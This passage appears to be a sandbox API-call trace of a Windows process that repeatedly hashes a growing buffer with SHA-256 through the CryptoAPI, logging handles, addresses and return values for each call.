	[0102.159] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.159] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.159] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.160] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.160] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x9c0, dwFlags=0x0) returned 1
	[0102.160] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.160] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247860
	[0102.160] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247860, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247860, pdwDataLen=0x12941c) returned 1
	[0102.160] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.160] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.160] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.160] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.160] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x9e0, dwFlags=0x0) returned 1
	[0102.160] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.160] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247888
	[0102.160] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247888, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247888, pdwDataLen=0x12941c) returned 1
	[0102.160] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.160] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.161] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.161] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.161] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xa00, dwFlags=0x0) returned 1
	[0102.161] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.161] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2478b0
	[0102.161] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2478b0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2478b0, pdwDataLen=0x12941c) returned 1
	[0102.161] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.161] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.161] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.161] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.161] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xa20, dwFlags=0x0) returned 1
	[0102.162] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.162] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2478d8
	[0102.162] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2478d8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2478d8, pdwDataLen=0x12941c) returned 1
	[0102.162] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.162] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.162] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.162] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.162] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xa40, dwFlags=0x0) returned 1
	[0102.162] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.162] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247900
	[0102.162] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247900, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247900, pdwDataLen=0x12941c) returned 1
	[0102.162] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.162] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.162] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.163] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.163] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xa60, dwFlags=0x0) returned 1
	[0102.163] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247928
	[0102.163] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247928, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247928, pdwDataLen=0x12941c) returned 1
	[0102.163] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.163] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.163] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.163] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.163] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xa80, dwFlags=0x0) returned 1
	[0102.163] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247950
	[0102.163] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247950, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247950, pdwDataLen=0x12941c) returned 1
	[0102.163] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.163] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.163] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.164] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.164] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xaa0, dwFlags=0x0) returned 1
	[0102.164] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.164] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2479a8
	[0102.164] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2479a8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2479a8, pdwDataLen=0x12941c) returned 1
	[0102.164] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.164] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.164] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.164] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.164] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xac0, dwFlags=0x0) returned 1
	[0102.164] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.164] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2479d0
	[0102.164] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x2479d0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2479d0, pdwDataLen=0x12941c) returned 1
	[0102.164] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.164] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.164] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.165] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.165] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xae0, dwFlags=0x0) returned 1
	[0102.165] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.165] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2479f8
	[0102.165] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x2479f8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x2479f8, pdwDataLen=0x12941c) returned 1
	[0102.165] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.165] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.165] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.166] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.166] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xb00, dwFlags=0x0) returned 1
	[0102.166] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.166] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247a20
	[0102.166] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247a20, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247a20, pdwDataLen=0x12941c) returned 1
	[0102.166] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.166] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.166] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.166] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.166] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xb20, dwFlags=0x0) returned 1
	[0102.166] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.166] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247a48
	[0102.167] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247a48, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247a48, pdwDataLen=0x12941c) returned 1
	[0102.167] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.167] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.167] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.167] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.167] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0102.167] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.167] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247a70
	[0102.167] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247a70, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247a70, pdwDataLen=0x12941c) returned 1
	[0102.167] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.167] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.167] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.167] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.168] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0102.168] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.168] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247a98
	[0102.168] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247a98, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247a98, pdwDataLen=0x12941c) returned 1
	[0102.168] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.168] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.168] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.168] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.168] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0102.168] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.168] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247ac0
	[0102.168] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247ac0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247ac0, pdwDataLen=0x12941c) returned 1
	[0102.168] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.168] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.168] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.169] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.169] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0102.169] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.169] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247ae8
	[0102.169] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247ae8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247ae8, pdwDataLen=0x12941c) returned 1
	[0102.169] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.169] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.169] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.169] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.169] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0102.169] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.169] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247b10
	[0102.169] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247b10, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247b10, pdwDataLen=0x12941c) returned 1
	[0102.169] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.169] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.169] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.170] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.170] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0102.170] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.170] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247b38
	[0102.170] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247b38, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247b38, pdwDataLen=0x12941c) returned 1
	[0102.170] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.170] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.170] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.170] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.170] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0102.170] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.170] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247b60
	[0102.170] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247b60, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247b60, pdwDataLen=0x12941c) returned 1
	[0102.170] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.170] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.170] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.171] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.171] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0102.171] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.171] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247b88
	[0102.171] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247b88, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247b88, pdwDataLen=0x12941c) returned 1
	[0102.171] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.171] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.171] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.171] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.171] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0102.171] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.171] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247bb0
	[0102.171] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247bb0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247bb0, pdwDataLen=0x12941c) returned 1
	[0102.171] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.172] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.172] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.172] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.172] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0102.172] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.172] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247bd8
	[0102.172] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247bd8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247bd8, pdwDataLen=0x12941c) returned 1
	[0102.172] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.172] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.172] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.172] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.172] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0102.173] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.173] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247c00
	[0102.173] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247c00, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247c00, pdwDataLen=0x12941c) returned 1
	[0102.173] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.173] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.173] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.173] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.173] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0102.173] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.173] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247c28
	[0102.173] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247c28, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247c28, pdwDataLen=0x12941c) returned 1
	[0102.173] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.173] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.173] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.174] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.174] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0102.174] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247c50
	[0102.174] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x247c50, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247c50, pdwDataLen=0x12941c) returned 1
	[0102.174] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.174] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.174] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.174] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.174] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0102.174] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.174] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x247c78
	[0102.174] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x247c78, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x247c78, pdwDataLen=0x12941c) returned 1
	[0102.174] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.174] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
